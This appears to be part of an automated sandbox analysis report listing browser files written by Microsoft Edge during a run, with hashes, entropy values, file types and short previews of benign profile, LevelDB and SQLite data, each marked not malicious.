                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0eb4315a-becb-466d-a899-8e7fe11a6c56.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17031), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17033
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.447935645125418
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:stp+PGQSu4zszkfhpdEPicibGjQwR6WmaTYm:sGOXu/kfvdVbGcaCaTYm
                                                                                                                                                                                                                                                                                                  MD5:138F0BCE9E342AD0C077D9D6AF0F55A7
                                                                                                                                                                                                                                                                                                  SHA1:208F3A109BE99A188E3810FD93A4A3660F8A87A8
                                                                                                                                                                                                                                                                                                  SHA-256:FF6EAB15A1AB130B056EE3D972E2DC86BB79B1A4101D6A10E256EF5046E2281E
                                                                                                                                                                                                                                                                                                  SHA-512:273F8C656B8B73F0DF8360A5879EC66F93DC7C34ADE4AA176EACFA95FD07A80CA63110981D8D89FE4B7F6749569CAB08DB9FC982988FC58ACF60FA1F29422B68
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\160b4dce-be5e-483e-9777-4442360606b2.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9817
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.118759342018169
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:stp+kdpzszksZihUkzEu8+bV+FLPQA66WmaFIMYqPwYJ:stp+Qzszkfh5bGjQx6WmaTYm
                                                                                                                                                                                                                                                                                                  MD5:5EAC6061A8BBB676B9026F257FC68693
                                                                                                                                                                                                                                                                                                  SHA1:5E3B7EECF48E91B0A9D541DAF3AF74C4606E6688
                                                                                                                                                                                                                                                                                                  SHA-256:71515700038866DE6DBD4A4A96ABBC8D08D7E65C51AC62F286E17B089F0BA820
                                                                                                                                                                                                                                                                                                  SHA-512:26647A27FA44CBFC7E518D812AA99BB6B0333B4C136DD9DBFDE5997A9B39E919C4FF1ADC4FA99CD3392723EB8C1B59411AB3F89BB75857A20DF3C4E4BA1688B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3533f930-5c81-472b-82d8-73519d577586.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6bb0e8fc-1a08-4a54-bea3-4c1d22c22877.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40470
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561102447617546
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:h4FoOV7pLGLhOwWPEmfRH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVUV780UErwrSj1c:h4FoOjchOwWPEmfRHu1jaVV7XUdrSjkl
                                                                                                                                                                                                                                                                                                  MD5:A7A536FFADFC9CC205202C9210A0E327
                                                                                                                                                                                                                                                                                                  SHA1:EB903B0FD11FDD3FFE214F4C1C591A5BCC0E16BF
                                                                                                                                                                                                                                                                                                  SHA-256:2AD22265EA768B8510E4C3A8E85F363CDEB15B526FE91764AED08692D0D3EB36
                                                                                                                                                                                                                                                                                                  SHA-512:F7D7C5F38C085A774B95C4850E64DAE109B4CE554BB61DE289A58D4BE3162233E40733740F33EA73643C1221C37CF7A94981028454C004DF263246B93C262B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\730c1c79-b7d0-4d7a-95c5-77f9e68a120d.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.188641322562199
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X3Usa1923oH+Tcwtp3hBtB2KLl34X3r+q2P923oH+Tcwtp3hBWsIFUv:BQYebp3dFLp2+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                                  MD5:0E53B96401BCCDB6DDF1AD43ABFE46D1
                                                                                                                                                                                                                                                                                                  SHA1:58B6E532A63BFC1D3C0051230421290B66654DA9
                                                                                                                                                                                                                                                                                                  SHA-256:C7532D0DFDDA9265F4D727CDF09C41A28DA8BCC23F7444E4A41A9A25BEC0976A
                                                                                                                                                                                                                                                                                                  SHA-512:D36C7F93DB538D03C29A299C6C4884A741102B12688D3B738A8FAE55DF3335835875C42E2FFBFE5191F1479AFC4B36534A30B3DA766EF512E5FDC5E63CE47D28
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.212 162c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-01:01:26.286 162c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.222865924389114
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:v+/PN8FMfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8ufx2mjF
                                                                                                                                                                                                                                                                                                  MD5:3984AAD6AB16EA9F7CF6BE608F1A7320
                                                                                                                                                                                                                                                                                                  SHA1:F932770653FB5CBD7AED802AAEF00854705451B4
                                                                                                                                                                                                                                                                                                  SHA-256:3D4F8DD15DAA466EDA8AA51A4771245DF1B41AC25C7B6FF139FC50B86BFBE12F
                                                                                                                                                                                                                                                                                                  SHA-512:F6A9ED24BCD9F8FEF239377EE01BBCD4BB1822685EA0460DE38AB6FD2590EA9E4BDED345951100ABD2D5BE67174202F6D89D3C44DAB13096B6BA397244678480
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.107248348147677
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X1cTc+L+q2P923oH+Tcwt9Eh1tIFUt8U4X1cd311Zmw+U4X3uoLVkwO923oH+8:BicfL+v4Yeb9Eh16FUt8UicdH/+UWLVu
                                                                                                                                                                                                                                                                                                  MD5:04D07E2F489C7D51E63F6361C05F6C0E
                                                                                                                                                                                                                                                                                                  SHA1:68242C031EBA034330C91A4570F67C3F847097A2
                                                                                                                                                                                                                                                                                                  SHA-256:47B27FBEB36B0FEE69B7AF2C5F90A360A132780028EA14E42928C86F385173C4
                                                                                                                                                                                                                                                                                                  SHA-512:6FFBE56793948F681823713EBEFDFFB666C0D002F63959D0541A621B9476763415C848D0504A0FF5387F76EFFA0FD59BCD9FB773DD9A782664C2BA8D04D777AB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.096 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:01:26.098 1c7c Recovering log #3.2024/12/27-01:01:26.103 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.107248348147677
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4X1cTc+L+q2P923oH+Tcwt9Eh1tIFUt8U4X1cd311Zmw+U4X3uoLVkwO923oH+8:BicfL+v4Yeb9Eh16FUt8UicdH/+UWLVu
                                                                                                                                                                                                                                                                                                  MD5:04D07E2F489C7D51E63F6361C05F6C0E
                                                                                                                                                                                                                                                                                                  SHA1:68242C031EBA034330C91A4570F67C3F847097A2
                                                                                                                                                                                                                                                                                                  SHA-256:47B27FBEB36B0FEE69B7AF2C5F90A360A132780028EA14E42928C86F385173C4
                                                                                                                                                                                                                                                                                                  SHA-512:6FFBE56793948F681823713EBEFDFFB666C0D002F63959D0541A621B9476763415C848D0504A0FF5387F76EFFA0FD59BCD9FB773DD9A782664C2BA8D04D777AB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:26.096 1c7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-01:01:26.098 1c7c Recovering log #3.2024/12/27-01:01:26.103 1c7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4633205183813014
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5ifh:TouQq3qh7z3bY2LNW9WMcUvBu+
                                                                                                                                                                                                                                                                                                  MD5:154B87FA2C9B69E975F35C7F58735C2D
                                                                                                                                                                                                                                                                                                  SHA1:DE1006E5D0E706EE2AA61E9D10F4F0D8AD10A95C
                                                                                                                                                                                                                                                                                                  SHA-256:E61E8BCD195996D572E4AB989D92A9591AA443F7915B3F9317D41FD329532EC2
                                                                                                                                                                                                                                                                                                  SHA-512:5694C7096D95A6D02A745923B794CACD103FBE38461A52468E260D420573A133483968BA70D42A6ED6639B3A69993D24201576944C7A5005E780447AA849798B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                  MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                  SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                  SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                  SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):345
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.184463419444166
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xg+q2P923oH+TcwtnG2tMsIFUt8U4XgqJZmw+U4XO3VkwO923oH+TcwtnG2tM2:Buv4Yebn9GFUt8UMJ/+U1F5LYebn95J
                                                                                                                                                                                                                                                                                                  MD5:C6B2688D1C5C189A4B77E4EFF3CD22C3
                                                                                                                                                                                                                                                                                                  SHA1:C40225358871B354D444BB39A1499B5F34A9E1D3
                                                                                                                                                                                                                                                                                                  SHA-256:299D4AEF23814D0E1355C4C22ACBE0D0F0486B71C774439589D100D678EFB7B5
                                                                                                                                                                                                                                                                                                  SHA-512:36C27A54FBC160442A7697245B1145D64125FC89B19B2CA1946C04900A0C1AE66B2077A43121934534FB3EE964C1DD59012F8EECD795524A0F30E0318D1E7519
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.582 4c8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-01:01:21.583 4c8 Recovering log #3.2024/12/27-01:01:21.584 4c8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
